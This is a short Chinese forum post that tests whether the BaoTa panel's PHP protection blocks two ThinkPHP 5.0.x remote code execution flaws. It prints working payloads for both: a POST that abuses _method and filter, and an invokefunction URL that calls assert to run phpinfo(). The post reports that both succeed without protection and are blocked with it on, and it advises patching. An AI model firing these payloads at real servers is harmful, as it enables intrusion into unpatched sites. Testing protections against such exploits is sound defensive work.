本帖最后由 cuokon 于 2020-5-29 17:06 编辑
ThinkPHP 5.0.x板块执行漏洞
漏洞影响: 5.0.x<thinkphp<5.0.24
Payload: POST提交参数 s=phpinfo&_method=__construcT&filter=call_user_func
命令执行成功,开启宝塔PHP安全防护
再次请求 直接被拦截了
Thinkphp5控制器名过滤不严导致getshell
漏洞影响: 5.0.x<thinkphp<5.0.24
Payload:
http://url.com/?s=index/think\app/invokefunction&function=array_map&vars[]=assert&vars[][]=phpinfo()
成功利用,开启堡塔安全防护,该恶意请求直接被拦截
总结: 对于thinkphp5的命令执行有很好的防护效果,不过如果有漏洞最好还是进行更新!!!
|